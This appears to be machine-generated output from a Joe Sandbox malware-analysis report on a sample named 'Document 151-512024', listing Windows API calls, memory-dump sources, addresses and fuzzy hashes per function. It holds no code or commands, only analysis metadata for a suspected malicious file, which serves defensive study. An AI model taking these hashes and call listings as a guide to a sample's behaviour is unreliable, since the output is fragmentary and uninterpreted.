                                                                                                    • Opcode ID: 65c1cb7081a8e5bcf71e574604ae68a70480bb129cc26e64717fbd2fbf345135
                                                                                                    • Instruction ID: cdde50f39b0fd9053bd5f424a56461b9fb091a8eac67954c4971db145cdc372d
                                                                                                    • Opcode Fuzzy Hash: 65c1cb7081a8e5bcf71e574604ae68a70480bb129cc26e64717fbd2fbf345135
                                                                                                    • Instruction Fuzzy Hash: 3DE092B119A2267BDB201B769C0DFEB3F6CEF43BA1F400016F505D50C19AA4C880D6F0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00959693
                                                                                                      • Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596A2
                                                                                                      • Part of subcall function 00959639: BeginPath.GDI32(?), ref: 009596B9
                                                                                                      • Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596E2
                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 009D8887
                                                                                                    • LineTo.GDI32(?,?,?), ref: 009D8894
                                                                                                    • EndPath.GDI32(?), ref: 009D88A4
                                                                                                    • StrokePath.GDI32(?), ref: 009D88B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 1539411459-0
                                                                                                    • Opcode ID: 8153abd0fee07f5988ffb33010fd7c0cdbb7f75bea6e3365a6d9f836a825fe38
                                                                                                    • Instruction ID: a0459fb172713d49563f07b58ce96550aa02cc7ccdae1d8f3afd5710e04408ab
                                                                                                    • Opcode Fuzzy Hash: 8153abd0fee07f5988ffb33010fd7c0cdbb7f75bea6e3365a6d9f836a825fe38
                                                                                                    • Instruction Fuzzy Hash: 97F03A3608A259FAEF125F94AC09FCA3B5DAF06311F448002FA21651E2C7755551EBA5
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 009598CC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 009598D6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 009598E9
                                                                                                    • GetStockObject.GDI32(00000005), ref: 009598F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                    • String ID:
                                                                                                    • API String ID: 4037423528-0
                                                                                                    • Opcode ID: c17c1553435588fb57eb653cf87829b47615eb42f5b3591efb314b128791894c
                                                                                                    • Instruction ID: 2dd4bde34bcdbbceca3eede1a1bb1b34a865ee0b98f9a8c2a3c9b728b6ecb59f
                                                                                                    • Opcode Fuzzy Hash: c17c1553435588fb57eb653cf87829b47615eb42f5b3591efb314b128791894c
                                                                                                    • Instruction Fuzzy Hash: 6CE0657129D251AADF215BB8BC09BE87F15AB11336F04821AF6F5540E1C7714680EB11
                                                                                                    APIs
                                                                                                    • GetCurrentThread.KERNEL32 ref: 009A1634
                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,009A11D9), ref: 009A163B
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009A11D9), ref: 009A1648
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,009A11D9), ref: 009A164F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 3974789173-0
                                                                                                    • Opcode ID: b50b080c5f2c2eea848422c10f9442ed321268f2a7581bfacb14de7698dd07d9
                                                                                                    • Instruction ID: 781f8e89fe3a32530a0beef534a9db7f7bc20a08fb55a60f7e705870bebbfbe3
                                                                                                    • Opcode Fuzzy Hash: b50b080c5f2c2eea848422c10f9442ed321268f2a7581bfacb14de7698dd07d9
                                                                                                    • Instruction Fuzzy Hash: 02E086B1697212DBDB201FE09E0DB463B7CAF557A1F144809F245D9080D7348480D790
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 0099D858
                                                                                                    • GetDC.USER32(00000000), ref: 0099D862
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0099D882
                                                                                                    • ReleaseDC.USER32(?), ref: 0099D8A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 3c6149e7374204050b7fa61c5514301e1b053b580f1b6474472f5b319c3937d9
                                                                                                    • Instruction ID: a4083d121b53d09a41a6804ab75e5687c9c922a73b7f428041a14ef5f02a8a44
                                                                                                    • Opcode Fuzzy Hash: 3c6149e7374204050b7fa61c5514301e1b053b580f1b6474472f5b319c3937d9
                                                                                                    • Instruction Fuzzy Hash: DBE01AF0856206DFCF419FE1D80CA6DBBB5FB08311F14844AE806E7250C7389985EF40
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 0099D86C
                                                                                                    • GetDC.USER32(00000000), ref: 0099D876
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0099D882
                                                                                                    • ReleaseDC.USER32(?), ref: 0099D8A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 838dbcf782ce2189723845a4ea77cfb089ca9f94dce9ec99f637a1acb1c2eff7
                                                                                                    • Instruction ID: 2b74fbb05dbb0a395b8a9985088d2b0e162215ee2d6f9ecc122c28ab19c16dd0
                                                                                                    • Opcode Fuzzy Hash: 838dbcf782ce2189723845a4ea77cfb089ca9f94dce9ec99f637a1acb1c2eff7
                                                                                                    • Instruction Fuzzy Hash: 28E01AB0856206DFCF509FA0D80C66DBBB1FB08311F14844AE806E7250C7389945EF40
                                                                                                    APIs
                                                                                                      • Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625
                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 009B4ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Connection_wcslen
                                                                                                    • String ID: *$LPT
                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                    • Opcode ID: 20610f4f6246f92e7e8c7ccd4fe5ed33b31b212e1508d58a09ea5c7bee69e304
                                                                                                    • Instruction ID: fb5ed206db58b048c55f282a847d53d646877fd05e447b743870146fdb487a38
                                                                                                    • Opcode Fuzzy Hash: 20610f4f6246f92e7e8c7ccd4fe5ed33b31b212e1508d58a09ea5c7bee69e304
                                                                                                    • Instruction Fuzzy Hash: A5917F75A002149FCB14DF58C584EAABBF5BF48314F198099E80A9F3A3C735EE85DB91
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0096E30D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 8f2b8eb1ed21137a1bf6c6106d60e5291224f29b7550b39a98e03848b3c1b864
                                                                                                    • Instruction ID: 5ea37d14fcb54d6560837c42917471b51430d9961794ffbe7671bae7195aee3c
                                                                                                    • Opcode Fuzzy Hash: 8f2b8eb1ed21137a1bf6c6106d60e5291224f29b7550b39a98e03848b3c1b864
                                                                                                    • Instruction Fuzzy Hash: 9E518E66A1C20296CB267754CD41779BBACEF40740F34CD68E0D9873F8EF348C959A86
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #
                                                                                                    • API String ID: 0-1885708031
                                                                                                    • Opcode ID: f4b75e8ff4ef429085c39139dbd7c589051b6510faee7b12090d119a4ca0c32e
                                                                                                    • Instruction ID: 991be25fc65aa657ee8c5eaf8a50bb9bbccd5679486dcf5deb8072d3ba7c9017
                                                                                                    • Opcode Fuzzy Hash: f4b75e8ff4ef429085c39139dbd7c589051b6510faee7b12090d119a4ca0c32e
                                                                                                    • Instruction Fuzzy Hash: AE514271904346DFDF19DFA8C081AFA7BACEF55311F248415ECA19B2C0D6359E86CBA1
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000), ref: 0095F2A2
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0095F2BB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                    • String ID: @
                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                    • Opcode ID: b1973db4600558f83f3f23786b1de4eca4830e527dc18798fa0dddbdcd9f6518
                                                                                                    • Instruction ID: 538b7967d0bfc6b65f3c87c82f804fd2d138dbf957820eda499c450ce18fc9d0
                                                                                                    • Opcode Fuzzy Hash: b1973db4600558f83f3f23786b1de4eca4830e527dc18798fa0dddbdcd9f6518
                                                                                                    • Instruction Fuzzy Hash: E65133B24197489BD320AF50D886BABBBF8FBC4300F81885DF1D9411A5EB318569CB67
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009C57E0
                                                                                                    • _wcslen.LIBCMT ref: 009C57EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                    • String ID: CALLARGARRAY
                                                                                                    • API String ID: 157775604-1150593374
                                                                                                    • Opcode ID: 82527b0b889a03b74a4d1aa918ccc5bd453ff0446e79b82daa882404ade771f8
                                                                                                    • Instruction ID: ecd978f95867e2fde27aaa5862dedb2337d823cb1435de54aa836bf839ea10f6
                                                                                                    • Opcode Fuzzy Hash: 82527b0b889a03b74a4d1aa918ccc5bd453ff0446e79b82daa882404ade771f8
                                                                                                    • Instruction Fuzzy Hash: C641AF71E002099FCB14DFA9C891EAEBBB9EF99350F11402DF505A7261E730AD81CBA1
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 009BD130
                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009BD13A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                    • String ID: |
                                                                                                    • API String ID: 596671847-2343686810
                                                                                                    • Opcode ID: 5abe68552246bc37a64ab199bb675431b3ba1d08f29aa31aebfcd6b7d17f9ffc
                                                                                                    • Instruction ID: a13107ad7595f5b092f3b137f796abc21c1c51233ed94ffbd6d8e3e98bbf9d12
                                                                                                    • Opcode Fuzzy Hash: 5abe68552246bc37a64ab199bb675431b3ba1d08f29aa31aebfcd6b7d17f9ffc
                                                                                                    • Instruction Fuzzy Hash: C5313971D01209ABCF15EFA4CD85EEF7FB9FF45310F000019E815A6262E731AA16CB50
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 009D3621
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009D365C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$DestroyMove
                                                                                                    • String ID: static
                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                    • Opcode ID: 5749dc9a3aa5478cf974870a92e635b7754ced681e3ecb99e8a0174af9eeb631
                                                                                                    • Instruction ID: b7bc23ff032264f0448131e1e22a320f74dfbe104db7a195778432829eebe7b7
                                                                                                    • Opcode Fuzzy Hash: 5749dc9a3aa5478cf974870a92e635b7754ced681e3ecb99e8a0174af9eeb631
                                                                                                    • Instruction Fuzzy Hash: 4331AAB1150204AEDB109F68DC81FBB73ADFF88724F40C61AF8A997280DA31ED81D761
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                      • Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952
                                                                                                    • GetParent.USER32(?), ref: 009973A3
                                                                                                    • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0099742D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$ParentProc
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 2181805148-3368625520
                                                                                                    • Opcode ID: 66c6c7d7786b423e0c4a185b08cbc11cc4a3d9afb756d729ebf57162bf5b632d
                                                                                                    • Instruction ID: 90eb1d9102bbcb70a955882f978fcf6ec61240aa75bab68c4a01e46fd2695429
                                                                                                    • Opcode Fuzzy Hash: 66c6c7d7786b423e0c4a185b08cbc11cc4a3d9afb756d729ebf57162bf5b632d
                                                                                                    • Instruction Fuzzy Hash: 1D21D030604104EFEF25CFAEDC59AA93BAAEF4A360F044255FE254B2B2C7318D55E740
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009D327C
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009D3287
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: Combobox
                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                    • Opcode ID: d81b3fc4007c1b9a715f12d4141fe958649e0f8d99d928101bb55e5f26db7d92
                                                                                                    • Instruction ID: 5fc6c433181e07e741f43004379bf453d2dd05a9c6a8fa464f78e98cdac08bac
                                                                                                    • Opcode Fuzzy Hash: d81b3fc4007c1b9a715f12d4141fe958649e0f8d99d928101bb55e5f26db7d92
                                                                                                    • Instruction Fuzzy Hash: 7F11E6717801087FEF119E94DC80EBB375EEB94365F10C126F62497390D6319D518760
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateMenuPopup
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3826294624-3368625520
                                                                                                    • Opcode ID: 8ee057e4f3afca2b162f0e9d2cc4ff453ae1dd2c534310ba270fcf1ef559c67d
                                                                                                    • Instruction ID: 51380582fbace6b5de1c531e9bd898d4ffd71657efb251157517c04f9db751d6
                                                                                                    • Opcode Fuzzy Hash: 8ee057e4f3afca2b162f0e9d2cc4ff453ae1dd2c534310ba270fcf1ef559c67d
                                                                                                    • Instruction Fuzzy Hash: 12216D74A482049FCB20CF68C445BD6B7E9FB0A365F08C05BE9699B351D331AE42DF52
                                                                                                    APIs
                                                                                                      • Part of subcall function 0094600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0094604C
                                                                                                      • Part of subcall function 0094600E: GetStockObject.GDI32(00000011), ref: 00946060
                                                                                                      • Part of subcall function 0094600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094606A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 009D377A
                                                                                                    • GetSysColor.USER32(00000012), ref: 009D3794
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                    • String ID: static
                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                    • Opcode ID: 147c0bd07e7c0fde7f2fecd95bdf3f78946658476ce9054d157e251bbc6e0065
                                                                                                    • Instruction ID: 84dc8693bdc909b0d7bcc7dce9ef0258cb1a3d0955a08e6f1a1d13dc1a59e5ff
                                                                                                    • Opcode Fuzzy Hash: 147c0bd07e7c0fde7f2fecd95bdf3f78946658476ce9054d157e251bbc6e0065
                                                                                                    • Instruction Fuzzy Hash: 1E1137B265060AAFDF00DFA8CC46EEA7BF8FB08355F008916F955E2250E735E851DB60
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009D61FC
                                                                                                    • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 009D6225
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
